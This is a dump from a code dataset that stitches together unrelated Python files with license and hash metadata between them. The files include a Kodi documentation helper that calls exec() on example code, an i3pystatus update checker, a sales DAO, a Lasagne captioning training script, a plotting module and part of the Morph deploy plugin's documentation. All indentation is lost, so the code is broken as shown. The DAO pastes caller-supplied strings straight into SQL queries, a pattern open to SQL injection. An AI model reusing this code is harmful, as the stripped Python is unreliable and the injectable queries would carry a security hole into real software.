final_header = ''
newline = ''
temp_raw = raw_find.splitlines()
for line in temp_raw:
if counter == 0:
removal_string += line
if '[' in line:
replace_file = Find_In_Text(content=line,start='\[',end='\]')
for item in replace_file:
line = line.replace(item,'')
if ',' in line:
header_extension = line.split(',')
for item in header_extension:
if '=' in item:
item = item.split('=')[0]
final_header += item+','
final_header = 'koding.'+name+final_header[:-2]+')'
else:
final_header = 'koding.'+name+line[:-1]
else:
removal_string += '\n'+line
counter += 1
if counter == 2:
break
if final_header.endswith('))'):
final_header = final_header[:-1]
if final_header.startswith('koding.User_Info'):
final_header = 'koding.User_Info()'
full_text = raw_find.replace(removal_string,'').strip()
# Initialise the dialog select
dialog_array = ['Documentation']
if code:
dialog_array.append('Run Example Code')
if video:
dialog_array.append('Watch Video')
# If there's more than one item we show a dialog select otherwise we just load up the text window
if len(dialog_array) > 1:
choice = dialog.select(name, dialog_array)
if choice >= 0:
choice = dialog_array[choice]
if choice == 'Documentation':
Text_Box(final_header,full_text
.replace('AVAILABLE PARAMS:','[COLOR=dodgerblue]AVAILABLE PARAMS:[/COLOR]')
.replace('EXAMPLE CODE:','[COLOR=dodgerblue]EXAMPLE CODE:[/COLOR]')
.replace('IMPORTANT:','[COLOR=gold]IMPORTANT:[/COLOR]')
.replace('CODE:','[COLOR=dodgerblue]CODE:[/COLOR]')
.replace('AVAILABLE VALUES:','[COLOR=dodgerblue]AVAILABLE VALUES:[/COLOR]')
.replace('WARNING:','[COLOR=red]WARNING:[/COLOR]'))
elif choice == 'Run Example Code':
codefile = filepath.split(os.sep)
codefile = codefile[len(codefile)-1].replace('.py','')
exec('from %s import *' % codefile)
# exec('from %s import %s' % (codefile, params["name"]))
exec(code)
elif choice == 'Watch Video':
Play_Video(video)
if choice < 0:
return
else:
Text_Box(final_header,full_text
.replace('AVAILABLE PARAMS:','[COLOR=dodgerblue]AVAILABLE PARAMS:[/COLOR]')
.replace('EXAMPLE CODE:','[COLOR=dodgerblue]EXAMPLE CODE:[/COLOR]')
.replace('IMPORTANT:','[COLOR=gold]IMPORTANT:[/COLOR]')
.replace('CODE:','[COLOR=dodgerblue]CODE:[/COLOR]')
.replace('AVAILABLE VALUES:','[COLOR=dodgerblue]AVAILABLE VALUES:[/COLOR]')
.replace('WARNING:','[COLOR=red]WARNING:[/COLOR]'))
|
gpl-2.0
| -4,688,523,344,214,192,000
| 42.893491
| 216
| 0.588434
| false
| 3.776986
| false
| false
| false
|
juliushaertl/i3pystatus
|
i3pystatus/updates/__init__.py
|
1
|
3829
|
import threading
from i3pystatus import SettingsBase, Module, formatp
from i3pystatus.core.util import internet, require
class Backend(SettingsBase):
settings = ()
updates = 0
class Updates(Module):
"""
Generic update checker.
To use select appropriate backend(s) for your system.
For list of all available backends see :ref:`updatebackends`.
Left clicking on the module will refresh the count of upgradeable packages.
This may be used to dismiss the notification after updating your system.
.. rubric:: Available formatters
* `{count}` — Sum of all available updates from all backends.
* For each backend registered there is one formatter named after the backend,
multiple identical backends do not accumulate, but overwrite each other.
* For example, `{Cower}` (note capitcal C) is the number of updates reported by
the cower backend, assuming it has been registered.
.. rubric:: Usage example
::
from i3pystatus import Status
from i3pystatus.updates import pacman, cower
status = Status(standalone=True)
status.register("updates",
format = "Updates: {count}",
format_no_updates = "No updates",
backends = [pacman.Pacman(), cower.Cower()])
status.run()
"""
interval = 3600
settings = (
("backends", "Required list of backends used to check for updates."),
("format", "Format used when updates are available. "
"May contain formatters."),
("format_no_updates", "String that is shown if no updates are available."
" If not set the module will be hidden if no updates are available."),
("format_working", "Format used while update queries are run. By default the same as ``format``."),
"color",
"color_no_updates",
"color_working",
("interval", "Default interval is set to one hour."),
)
required = ("backends",)
backends = None
format = "Updates: {count}"
format_no_updates = None
format_working = None
color = "#00DD00"
color_no_updates = "#FFFFFF"
color_working = None
on_leftclick = "run"
def init(self):
if not isinstance(self.backends, list):
self.backends = [self.backends]
if self.format_working is None: # we want to allow an empty format
self.format_working = self.format
self.color_working = self.color_working or self.color
self.data = {
"count": 0
}
self.condition = threading.Condition()
self.thread = threading.Thread(target=self.update_thread, daemon=True)
self.thread.start()
def update_thread(self):
self.check_updates()
while True:
with self.condition:
self.condition.wait(self.interval)
self.check_updates()
@require(internet)
def check_updates(self):
self.output = {
"full_text": formatp(self.format_working, **self.data).strip(),
"color": self.color_working,
}
updates_count = 0
for backend in self.backends:
updates = backend.updates
updates_count += updates
self.data[backend.__class__.__name__] = updates
if updates_count == 0:
self.output = {} if not self.format_no_updates else {
"full_text": self.format_no_updates,
"color": self.color_no_updates,
}
return
self.data["count"] = updates_count
self.output = {
"full_text": formatp(self.format, **self.data).strip(),
"color": self.color,
}
def run(self):
with self.condition:
self.condition.notify()
|
mit
| 3,242,534,360,093,105,000
| 30.628099
| 107
| 0.597857
| false
| 4.348864
| false
| false
| false
|
git-pedro-77/PROYECTOFINALPYTHON
|
proyectoITSAE/ec/edu/itsae/dao/ventaDao.py
|
1
|
2654
|
# coding:utf-8
'''
Created on 27/1/2015
@author: Programacion
'''
from ec.edu.itsae.conn import DBcon
#from flask import redirect, url_for
import json
class VentaDao(DBcon.DBcon):#heredando
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
pass#sirve cuando no hay implementacion en el metodo
def reportarventa(self):
con=self.conexion().connect().cursor() #capturando de la clase DBcon
con.execute(" select * from venta ")
reporte=con.fetchall()
return reporte #despues del return no se debe colocar nada
def grabarVenta(self, vendedor, turno, fechaventa,gestion ):
con=self.conexion().connect()
sql= """insert into venta(vendedor, turno, fechaventa, gestion)
values ('%s','%s', '%s','%s')
""" %(vendedor, turno, fechaventa,gestion )
#print sql Para imprimir nuestra consulta para poder ver
with con:
cursor=con.cursor()
cursor.execute(sql)#aqui debe estar sql para que se ejecute el insert
#deber actualizar y eliminar
''' def eliminarCliente(self,datoelim):
con=self.conexion().connect()
sql= """ delete from cliente where id_cliente= %i """ %int(datoelim)
#print sql Para imprimir nuestra consulta para poder ver
with con:
cursor=con.cursor()
cursor.execute(sql)'''
def buscarVentaFactura(self, datobusca):
con=self.conexion().connect().cursor()
con.execute(""" select CONCAT (nombre,' ', apellido) as value, id_cliente as id from cliente where upper(CONCAT (nombre,' ', apellido)) like upper('%s') """ %("%"+datobusca+"%") )
reporte=con.fetchall()
columna=('value', 'id')
lista=[]
for row in reporte:
lista.append(dict(zip(columna,row)))
return json.dumps(lista, indent=2)
def buscarVentaDato(self, datobuscado):
con=self.conexion().connect().cursor()
sql=""" select * from cliente where upper(CONCAT (nombre,' ', apellido)) like upper('%s') """ %("%"+datobuscado+"%")
con.execute(sql)
reporte=con.fetchall()
return reporte
def validarventa(self, datot):
con=self.conexion().connect().cursor()
sql=""" select * from personas p, trabajador t where t.idpersona=%i """ %(datot)
con.execute(sql)
reporte=con.fetchall()
return reporte
|
gpl-2.0
| -8,052,328,900,098,061,000
| 32.051282
| 187
| 0.558779
| false
| 3.451235
| false
| false
| false
|
erfannoury/capgen-lasagne
|
another no-ft-ln-hs-largelr.py
|
1
|
13876
|
from __future__ import division, print_function
import logging
import numpy as np
import scipy as sc
import skimage
from skimage import transform
import theano
import theano.tensor as T
import lasagne
import sys
import cPickle as pickle
from datetime import datetime
from collections import OrderedDict
from mscoco_threaded_iter import COCOCaptionDataset
sys.path.append('/home/noury/codevault/Recipes/modelzoo/')
sys.path.append('/home/noury/codevault/seq2seq-lasagne/')
from resnet50 import build_model
from CustomLSTMLayer import LNLSTMLayer
from HierarchicalSoftmax import HierarchicalSoftmaxLayer
from LayerNormalization import LayerNormalizationLayer
sys.setrecursionlimit(10000)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(message)s', '%m/%d/%Y %I:%M:%S %p')
fh = logging.FileHandler('another_no_ft_ln_hs_largelr.log')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
sh = logging.StreamHandler(sys.stdout)
sh.setLevel(logging.INFO)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
logger.info('Loading the ResNet50 model.')
# First get the ResNet50 model
resnet_weights_path = '/home/noury/modelzoo/resnet50.pkl'
resnet = build_model()
model_params = pickle.load(open(resnet_weights_path, 'rb'))
lasagne.layers.set_all_param_values(resnet['prob'], model_params['values'])
mean_im = model_params['mean_image'].reshape((1, 3, 224, 224)).astype(np.float32)
# Load the files needed for the MS COCO Captions dataset
train_images_path = '/home/noury/datasets/mscoco/train2014'
valid_images_path = '/home/noury/datasets/mscoco/val2014'
train_annotations_filepath = '/home/noury/datasets/mscoco/annotations/captions_train2014.json'
valid_annotations_filepath = '/home/noury/datasets/mscoco/annotations/captions_val2014.json'
coco_captions = pickle.load(open('coco_captions_trainval2014.pkl', 'rb'))
train_buckets = coco_captions['train buckets']
valid_buckets = coco_captions['valid buckets']
wordset = coco_captions['raw wordset']
word2idx = {}
word2idx['<PAD>'] = 0
word2idx['<GO>'] = 1
word2idx['<EOS>'] = 2
for i, w in enumerate(wordset):
word2idx[w] = i+3
idx2word = map(lambda x: x[0], sorted(word2idx.items(), key=lambda x: x[1]))
bucket_minibatch_sizes = {16:256, 32:128, 64:64}
logger.info('Creating global variables')
CONTINUE = False
HIDDEN_SIZE = 2048
EMBEDDING_SIZE = 300
WORD_SIZE = len(idx2word)
DENSE_SIZE = 1024
ORDER_VIOLATION_COEFF = 10.0
L2_COEFF = 1e-3
RNN_GRAD_CLIP = 64
TOTAL_MAX_NORM = 128
RECURR_LR = theano.shared(np.float32(0.001), 'recurrent lr')
EPOCH_LR_COEFF = np.float32(0.5)
NUM_EPOCHS = 15
validation_losses = []
total_loss_values = []
order_embedding_loss_values = []
l2_values = []
recurrent_norm_values = []
validation_total_loss_values = []
validation_order_embedding_loss_values = []
validation_l2_values = []
logger.info('Building the network.')
im_features = lasagne.layers.get_output(resnet['pool5'])
im_features = T.flatten(im_features, outdim=2) # batch size, number of features
cap_out_var = T.imatrix('cap_out') # batch size, seq len
cap_in_var = T.imatrix('cap_in') # batch size, seq len
mask_var = T.bmatrix('mask_var') # batch size, seq len
l_hid = lasagne.layers.InputLayer((None, HIDDEN_SIZE), input_var=im_features, name="l_hid")
gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=lasagne.init.Normal(), b=lasagne.init.Constant(0.0))
cell_gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=None, b=lasagne.init.Constant(0.0),
nonlinearity=lasagne.nonlinearities.tanh)
forget_gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=lasagne.init.Normal(), b=lasagne.init.Constant(5.0))
l_in = lasagne.layers.InputLayer((None, None), cap_in_var, name="l_in")
l_mask = lasagne.layers.InputLayer((None, None), mask_var, name="l_mask")
l_emb = lasagne.layers.EmbeddingLayer(l_in, input_size=WORD_SIZE, output_size=EMBEDDING_SIZE, name="l_emb")
l_lstm = LNLSTMLayer(l_emb, HIDDEN_SIZE, ingate=gate, forgetgate=forget_gate, cell=cell_gate,
outgate=gate, hid_init=l_hid, peepholes=False, grad_clipping=RNN_GRAD_CLIP,
mask_input=l_mask, precompute_input=False,
alpha_init=lasagne.init.Constant(0.1), # as suggested by Ryan Kiros on Twitter
normalize_cell=False,
name="l_lstm") # batch size, seq len, hidden size
l_reshape = lasagne.layers.ReshapeLayer(l_lstm, (-1, [2]), name="l_reshape") # batch size * seq len, hidden size
l_fc = lasagne.layers.DenseLayer(l_reshape, DENSE_SIZE, b=lasagne.init.Constant(5.0),
nonlinearity=lasagne.nonlinearities.rectify, name="l_fc")
l_drp = lasagne.layers.DropoutLayer(l_fc, 0.3, name="l_drp")
l_hs = HierarchicalSoftmaxLayer(l_drp, WORD_SIZE, name="l_hs") # batch size * seq len, WORD SIZE
l_slice = lasagne.layers.SliceLayer(l_lstm, -1, axis=1, name="l_slice")
if CONTINUE:
import glob
param_values = glob.glob('another_no_ft_ln_hs_largelr_param_values_*.pkl')
max_epoch = max(map(lambda x: int(x[len('another_no_ft_ln_hs_largelr_param_values_'):-len('.pkl')]), param_values))
logger.info('Continue training from epoch {}'.format(max_epoch + 1))
logger.info('Setting previous parameter values from epoch {}'.format(max_epoch))
logger.info('Setting model weights from epoch {}'.format(max_epoch))
param_values_file = 'another_no_ft_ln_hs_largelr_param_values_{}.pkl'.format(max_epoch)
param_values = pickle.load(open(param_values_file, 'rb'))
lasagne.layers.set_all_param_values(l_hs, param_values['recurrent'])
lasagne.layers.set_all_param_values(resnet['pool5'], param_values['resnet'])
RECURR_LR = theano.shared(np.float32(param_values['lr']), 'recurrent lr')
[total_loss_values, order_embedding_loss_values, l2_values,
recurrent_norm_values]= pickle.load(open('another_no_ft_ln_hs_largelr_training_losses.pkl', 'rb'))
[validation_total_loss_values, validation_order_embedding_loss_values,
validation_l2_values] = pickle.load(open('another_no_ft_ln_hs_largelr_validation_losses.pkl', 'rb'))
[validation_losses, recurr_lr_val] = pickle.load(open('another_no_ft_ln_hs_largelr_artifacts.pkl', 'rb'))
logger.info('Creating output and loss variables')
prediction = lasagne.layers.get_output(l_hs, deterministic=False)
flat_cap_out_var = T.flatten(cap_out_var, outdim=1)
flat_mask_var = T.flatten(lasagne.layers.get_output(l_mask), outdim=1)
loss = T.mean(lasagne.objectives.categorical_crossentropy(prediction, flat_cap_out_var)[flat_mask_var.nonzero()])
caption_features = lasagne.layers.get_output(l_slice, deterministic=False)
order_embedding_loss = T.pow(T.maximum(0, caption_features - im_features), 2).mean()
l2 = lasagne.regularization.regularize_network_params(l_hs, lasagne.regularization.l2)
total_loss = loss + ORDER_VIOLATION_COEFF * order_embedding_loss + L2_COEFF * l2
deterministic_prediction = lasagne.layers.get_output(l_hs, deterministic=True)
deterministic_captions = lasagne.layers.get_output(l_slice, deterministic=True)
deterministic_loss = T.mean(lasagne.objectives.categorical_crossentropy(deterministic_prediction, flat_cap_out_var)[flat_mask_var.nonzero()])
deterministic_order_embedding_loss = T.pow(T.maximum(0, deterministic_captions - im_features), 2).mean()
deterministic_l2 = lasagne.regularization.regularize_network_params(l_hs, lasagne.regularization.l2)
deterministic_total_loss = deterministic_loss + ORDER_VIOLATION_COEFF * deterministic_order_embedding_loss \
+ L2_COEFF * deterministic_l2
logger.info('Getting all parameters and creating update rules.')
recurrent_params = lasagne.layers.get_all_params(l_hs, trainable=True)
recurrent_grads = T.grad(total_loss, recurrent_params)
recurrent_grads, recurrent_norm = lasagne.updates.total_norm_constraint(recurrent_grads, TOTAL_MAX_NORM, return_norm=True)
recurrent_updates = lasagne.updates.rmsprop(recurrent_grads, recurrent_params, learning_rate=RECURR_LR)
logger.info("Creating the Theano function for Adam update")
train_fun = theano.function([resnet['input'].input_var, cap_in_var, mask_var, cap_out_var],
[total_loss, order_embedding_loss, l2, recurrent_norm],
updates=recurrent_updates)
logger.info("Creating the evaluation Theano function")
eval_fun = theano.function([resnet['input'].input_var, cap_in_var, mask_var, cap_out_var],
[deterministic_total_loss, deterministic_order_embedding_loss, deterministic_l2])
logger.info('Loading the COCO Captions training and validation sets.')
coco_train = COCOCaptionDataset(train_images_path, train_annotations_filepath, train_buckets,
bucket_minibatch_sizes, word2idx, mean_im, True)
coco_valid = COCOCaptionDataset(valid_images_path, valid_annotations_filepath, valid_buckets,
bucket_minibatch_sizes, word2idx, mean_im, False)
logger.info("Starting the training process...")
START = 1
if CONTINUE:
START = max_epoch + 1
for e in xrange(START, NUM_EPOCHS + 1):
logger.info("Starting epoch".format(e))
if len(validation_losses) > 2 and \
validation_losses[-3] < validation_losses[-1] and \
validation_losses[-2] < validation_losses[-1]:
RECURR_LR.set_value(RECURR_LR.get_value() * EPOCH_LR_COEFF)
logger.info("Lowering the learning rate to {}".format(RECURR_LR.get_value()))
logger.info("Starting training on epoch {} with LR = {}".format(e, RECURR_LR.get_value()))
mb = 0
now = datetime.now()
for im, cap_in, cap_out in coco_train:
tl, oe, el2, recn = train_fun(im, cap_in, (cap_in > 0).astype(np.int8), cap_out)
logger.debug("Epoch: {}, Minibatch: {}, Total Loss: {}, Order-embedding loss: {}, L2 value: {}, Recurrent norm: {}".format(e, mb, tl, oe, el2, recn))
total_loss_values.append(tl)
order_embedding_loss_values.append(oe)
l2_values.append(el2)
recurrent_norm_values.append(recn)
mb += 1
logger.info("Training epoch {} took {}.".format(e, datetime.now() - now))
logger.info("Epoch {} results:".format(e))
logger.info("\t\tMean total loss: {}".format(np.mean(total_loss_values[-mb:])))
logger.info("\t\tMean order embedding loss: {}".format(np.mean(order_embedding_loss_values[-mb:])))
logger.info("\t\tMean l2 value: {}".format(np.mean(l2_values[-mb:])))
logger.info("\t\tMean Recurrent norm: {}".format(np.mean(recurrent_norm_values[-mb:])))
logger.info("Saving model parameters for epoch {}".format(e))
pickle.dump({'resnet':lasagne.layers.get_all_param_values(resnet['pool5']),
'recurrent':lasagne.layers.get_all_param_values(l_hs),
'mean image':mean_im,
'lr':RECURR_LR.get_value()},
open('another_no_ft_ln_hs_largelr_param_values_{}.pkl'.format(e), 'wb'), protocol=-1)
logger.info("Saving loss values for epoch {}".format(e))
pickle.dump([total_loss_values, order_embedding_loss_values, l2_values,
recurrent_norm_values],
open('another_no_ft_ln_hs_largelr_training_losses.pkl', 'wb'), protocol=-1)
logger.info("Validating the model on epoch {} on the validation set.".format(e))
mb = 0
now = datetime.now()
for im, cap_in, cap_out in coco_valid:
tl, oe, el2 = eval_fun(im, cap_in, (cap_in > 0).astype(np.int8), cap_out)
logger.debug("Validation epoch: {}, Minibatch: {}, Validation total loss: {}, Validation order-embedding loss: {}, Validation l2 value: {}".format(e, mb, tl, oe, el2))
validation_total_loss_values.append(tl)
validation_order_embedding_loss_values.append(oe)
validation_l2_values.append(el2)
mb += 1
logger.info("Validating epoch {} took {}.".format(e, datetime.now() - now))
logger.info("Epoch {} validation results:".format(e))
logger.info("\t\tValidation mean total loss: {}".format(np.mean(validation_total_loss_values[-mb:])))
logger.info("\t\tValidation mean order-embedding loss: {}".format(np.mean(validation_order_embedding_loss_values[-mb:])))
logger.info("\t\tValidation mean l2 value: {}".format(np.mean(validation_l2_values[-mb:])))
validation_losses.append(np.mean(validation_total_loss_values[-mb:]))
logger.info("Saving validation loss values for epoch {}".format(e))
pickle.dump([validation_total_loss_values, validation_order_embedding_loss_values, validation_l2_values],
open('another_no_ft_ln_hs_largelr_validation_losses.pkl', 'wb'), protocol=-1)
pickle.dump([validation_losses, RECURR_LR.get_value()], open('another_no_ft_ln_hs_largelr_artifacts.pkl', 'wb'),
protocol=-1)
|
mit
| 2,184,633,508,584,648,400
| 55.868852
| 179
| 0.652061
| false
| 3.374514
| false
| false
| false
|
goulu/Goulib
|
Goulib/plot.py
|
1
|
4898
|
"""
plotable rich object display on IPython/Jupyter notebooks
"""
__author__ = "Philippe Guglielmetti"
__copyright__ = "Copyright 2015, Philippe Guglielmetti"
__credits__ = []
__license__ = "LGPL"
# import matplotlib and set backend once for all
from . import itertools2
import os
import io
import sys
import logging
import base64
import matplotlib
if os.getenv('TRAVIS'): # are we running https://travis-ci.org/ automated tests ?
matplotlib.use('Agg') # Force matplotlib not to use any Xwindows backend
elif sys.gettrace(): # http://stackoverflow.com/questions/333995/how-to-detect-that-python-code-is-being-executed-through-the-debugger
matplotlib.use('Agg') # because 'QtAgg' crashes python while debugging
else:
pass
# matplotlib.use('pdf') #for high quality pdf, but doesn't work for png, svg ...
logging.info('matplotlib backend is %s' % matplotlib.get_backend())
class Plot(object):
"""base class for plotable rich object display on IPython notebooks
inspired from http://nbviewer.ipython.org/github/ipython/ipython/blob/3607712653c66d63e0d7f13f073bde8c0f209ba8/docs/examples/notebooks/display_protocol.ipynb
"""
def _plot(self, ax, **kwargs):
"""abstract method, must be overriden
:param ax: `matplotlib.axis`
:return ax: `matplotlib.axis` after plot
"""
raise NotImplementedError(
'objects derived from plot.PLot must define a _plot method')
return ax
def render(self, fmt='svg', **kwargs):
return render([self], fmt, **kwargs) # call global function
def save(self, filename, **kwargs):
return save([self], filename, **kwargs) # call global function
# for IPython notebooks
def _repr_html_(self):
"""default rich format is svg plot"""
try:
return self._repr_svg_()
except NotImplementedError:
pass
# this returns the same as _repr_png_, but is Table compatible
buffer = self.render('png')
s = base64.b64encode(buffer).decode('utf-8')
return '<img src="data:image/png;base64,%s">' % s
def html(self, **kwargs):
from IPython.display import HTML
return HTML(self._repr_html_(**kwargs))
def svg(self, **kwargs):
from IPython.display import SVG
return SVG(self._repr_svg_(**kwargs))
def _repr_svg_(self, **kwargs):
return self.render(fmt='svg', **kwargs).decode('utf-8')
def png(self, **kwargs):
from IPython.display import Image
return Image(self._repr_png_(**kwargs), embed=True)
def _repr_png_(self, **kwargs):
return self.render(fmt='png', **kwargs)
def plot(self, **kwargs):
""" renders on IPython Notebook
(alias to make usage more straightforward)
"""
return self.svg(**kwargs)
def render(plotables, fmt='svg', **kwargs):
"""renders several Plot objects"""
import matplotlib.pyplot as plt
# extract optional arguments used for rasterization
printargs, kwargs = itertools2.dictsplit(
kwargs,
['dpi', 'transparent', 'facecolor', 'background', 'figsize']
)
ylim = kwargs.pop('ylim', None)
xlim = kwargs.pop('xlim', None)
title = kwargs.pop('title', None)
fig, ax = plt.subplots()
labels = kwargs.pop('labels', [None] * len(plotables))
# slightly shift the points to make superimposed curves more visible
offset = kwargs.pop('offset', 0)
for i, obj in enumerate(plotables):
if labels[i] is None:
labels[i] = str(obj)
if not title:
try:
title = obj._repr_latex_()
# check that title can be used in matplotlib
from matplotlib.mathtext import MathTextParser
parser = MathTextParser('path').parse(title)
except Exception as e:
title = labels[i]
ax = obj._plot(ax, label=labels[i], offset=i * offset, **kwargs)
if ylim:
plt.ylim(ylim)
if xlim:
plt.xlim(xlim)
ax.set_title(title)
if len(labels) > 1:
ax.legend()
output = io.BytesIO()
fig.savefig(output, format=fmt, **printargs)
data = output.getvalue()
plt.close(fig)
return data
def png(plotables, **kwargs):
from IPython.display import Image
return Image(render(plotables, 'png', **kwargs), embed=True)
def svg(plotables, **kwargs):
from IPython.display import SVG
return SVG(render(plotables, 'svg', **kwargs))
plot = svg
def save(plotables, filename, **kwargs):
ext = filename.split('.')[-1].lower()
kwargs.setdefault('dpi', 600) # force good quality
return open(filename, 'wb').write(render(plotables, ext, **kwargs))
|
lgpl-3.0
| 139,288,707,879,006,940
| 29.6
| 161
| 0.611066
| false
| 3.799845
| false
| false
| false
|
nuxeh/morph
|
morphlib/plugins/deploy_plugin.py
|
1
|
29928
|
# Copyright (C) 2013-2015 Codethink Limited
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
import json
import logging
import os
import shutil
import sys
import tarfile
import tempfile
import uuid
import cliapp
import morphlib
class DeployPlugin(cliapp.Plugin):
def enable(self):
group_deploy = 'Deploy Options'
self.app.settings.boolean(['upgrade'],
'specify that you want to upgrade an '
'existing cluster. Deprecated: use the '
'`morph upgrade` command instead',
group=group_deploy)
self.app.add_subcommand(
'deploy', self.deploy,
arg_synopsis='CLUSTER [DEPLOYMENT...] [SYSTEM.KEY=VALUE]')
self.app.add_subcommand(
'upgrade', self.upgrade,
arg_synopsis='CLUSTER [DEPLOYMENT...] [SYSTEM.KEY=VALUE]')
def disable(self):
pass
def deploy(self, args):
'''Deploy a built system image or a set of images.
Command line arguments:
* `CLUSTER` is the name of the cluster to deploy.
* `DEPLOYMENT...` is the name of zero or more deployments in the
morphology to deploy. If none are specified then all deployments
in the morphology are deployed.
* `SYSTEM.KEY=VALUE` can be used to assign `VALUE` to a parameter
named `KEY` for the system identified by `SYSTEM` in the cluster
morphology (see below). This will override parameters defined
in the morphology.
Morph deploys a set of systems listed in a cluster morphology.
"Deployment" here is quite a general concept: it covers anything
where a system image is taken, configured, and then put somewhere
where it can be run. The deployment mechanism is quite flexible,
and can be extended by the user.
A cluster morphology defines a list of systems to deploy, and
for each system a list of ways to deploy them. It contains the
following fields:
* **name**: MUST be the same as the basename of the morphology
filename, sans .morph suffix.
* **kind**: MUST be `cluster`.
* **systems**: a list of systems to deploy;
the value is a list of mappings, where each mapping has the
following keys:
* **morph**: the system morphology to use in the specified
commit.
* **deploy**: a mapping where each key identifies a
system and each system has at least the following keys:
* **type**: identifies the type of development e.g. (kvm,
nfsboot) (see below).
* **location**: where the deployed system should end up
at. The syntax depends on the deployment type (see below).
Any additional item on the dictionary will be added to the
environment as `KEY=VALUE`.
* **deploy-defaults**: allows multiple deployments of the same
system to share some settings, when they can. Default settings
will be overridden by those defined inside the deploy mapping.
# Example
name: cluster-foo
kind: cluster
systems:
- morph: devel-system-x86_64-generic.morph
deploy:
cluster-foo-x86_64-1:
type: kvm
location: kvm+ssh://user@host/x86_64-1/x86_64-1.img
HOSTNAME: cluster-foo-x86_64-1
DISK_SIZE: 4G
RAM_SIZE: 4G
VCPUS: 2
- morph: devel-system-armv7-highbank
deploy-defaults:
type: nfsboot
location: cluster-foo-nfsboot-server
deploy:
cluster-foo-armv7-1:
HOSTNAME: cluster-foo-armv7-1
cluster-foo-armv7-2:
HOSTNAME: cluster-foo-armv7-2
Each system defined in a cluster morphology can be deployed in
multiple ways (`type` in a cluster morphology). Morph provides
the following types of deployment:
* `tar` where Morph builds a tar archive of the root file system.
* `rawdisk` where Morph builds a raw disk image and sets up the
image with a bootloader and configuration so that it can be
booted. Disk size is set with `DISK_SIZE` (see below).
* `virtualbox-ssh` where Morph creates a VirtualBox disk image,
and creates a new virtual machine on a remote host, accessed
over ssh. Disk and RAM size are set with `DISK_SIZE` and
`RAM_SIZE` (see below).
* `kvm`, which is similar to `virtualbox-ssh`, but uses libvirt
and KVM instead of VirtualBox. Disk and RAM size are set with
`DISK_SIZE` and `RAM_SIZE` (see below).
* `nfsboot` where Morph creates a system to be booted over
a network.
* `ssh-rsync` where Morph copies a binary delta over to the target
system and arranges for it to be bootable. This requires
`system-version-manager` from the tbdiff chunk
* `initramfs`, where Morph turns the system into an initramfs image,
suitable for being used as the early userland environment for a
system to be able to locate more complicated storage for its root
file-system, or on its own for diskless deployments.
There are additional extensions that currently live in the Baserock
definitions repo (baserock:baserock/definitions). These include:
* `image-package` where Morph creates a tarball that includes scripts
that can be used to make disk images outside of a Baserock
environment. The example in definitions.git will create scripts for
generating disk images and installing to existing disks.
* `sdk` where Morph generates something resembing a BitBake SDK, which
provides a toolchain for building software to target a system built
by Baserock, from outside of a Baserock environment. This creates a
self-extracting shell archive which you pass a directory to extract
to, and inside that has a shell snippet called
environment-setup-$TARGET which can be used to set environment
variables to use the toolchain.
* `pxeboot` where Morph temporarily network-boots the system you are
deploying, so it can install a more permanent system onto local
storage.
In addition to the deployment type, the user must also give
a value for `location`. Its syntax depends on the deployment
types. The deployment types provided by Morph use the
following syntaxes:
* `tar`: pathname to the tar archive to be created; for
example, `/home/alice/testsystem.tar`
* `rawdisk`: pathname to the disk image to be created; for
example, `/home/alice/testsystem.img`
* `virtualbox-ssh` and `kvm`: a custom URL scheme that
provides the target host machine (the one that runs
VirtualBox or `kvm`), the name of the new virtual machine,
and the location on the target host of the virtual disk
file. The target host is accessed over ssh. For example,
`vbox+ssh://alice@192.168.122.1/testsys/home/alice/testsys.vdi`
or `kvm+ssh://alice@192.168.122.1/testsys/home/alice/testys.img`
where
* `alice@192.168.122.1` is the target as given to ssh,
**from within the development host** (which may be
different from the target host's normal address);
* `testsys` is the new VM's name;
* `/home/alice/testsys.vdi` and `/home/alice/testys.img` are
the pathnames of the disk image files on the target host.
* `nfsboot`: the address of the nfsboot server. (Note this is just
the _address_ of the trove, _not_ `user@...`, since `root@` will
automatically be prepended to the server address.)
In addition to the `location`parameter, deployments can take additional
`KEY=VALUE` parameters. These can be provided in the following ways:
1. In the cluster definition file, e.g.
...
systems:
- morph: systems/foo-system.morph
deploy:
foo:
HOSTNAME: foo
2. In the environment before running e.g.
`HOSTNAME=foo morph deploy ...`
3. On the command-line e.g.
`morph deploy clusters/foo.morph foo.HOSTNAME=foo`
For any boolean `KEY=VALUE` parameters, allowed values are:
+ve `yes`, `1`, `true`;
-ve `no`, `0`, `false`;
The following `KEY=VALUE` parameters are supported for `rawdisk`,
`virtualbox-ssh` and `kvm` and deployment types:
* `DISK_SIZE=X` to set the size of the disk image. `X` should use a
suffix of `K`, `M`, or `G` (in upper or lower case) to indicate
kilo-, mega-, or gigabytes. For example, `DISK_SIZE=100G` would
create a 100 gigabyte disk image. **This parameter is mandatory**.
The `kvm` and `virtualbox-ssh` deployment types support an additional
parameter:
* `RAM_SIZE=X` to set the size of virtual RAM for the virtual
machine. `X` is interpreted in the same was as `DISK_SIZE`,
and defaults to `1G`.
* `AUTOSTART=<VALUE>` - allowed values are `yes` and `no`
(default)
For the `nfsboot` write extension,
* the following `KEY=VALUE` pairs are mandatory
* `NFSBOOT_CONFIGURE=yes` (or any non-empty value). This
enables the `nfsboot` configuration extension (see
below) which MUST be used when using the `nfsboot`
write extension.
* `HOSTNAME=<STRING>` a unique identifier for that system's
`nfs` root when it's deployed on the nfsboot server - the
extension creates a directory with that name for the `nfs`
root, and stores kernels by that name for the tftp server.
* the following `KEY=VALUE` pairs are optional
* `VERSION_LABEL=<STRING>` - set the name of the system
version being deployed, when upgrading. Defaults to
"factory".
Each deployment type is implemented by a **write extension**. The
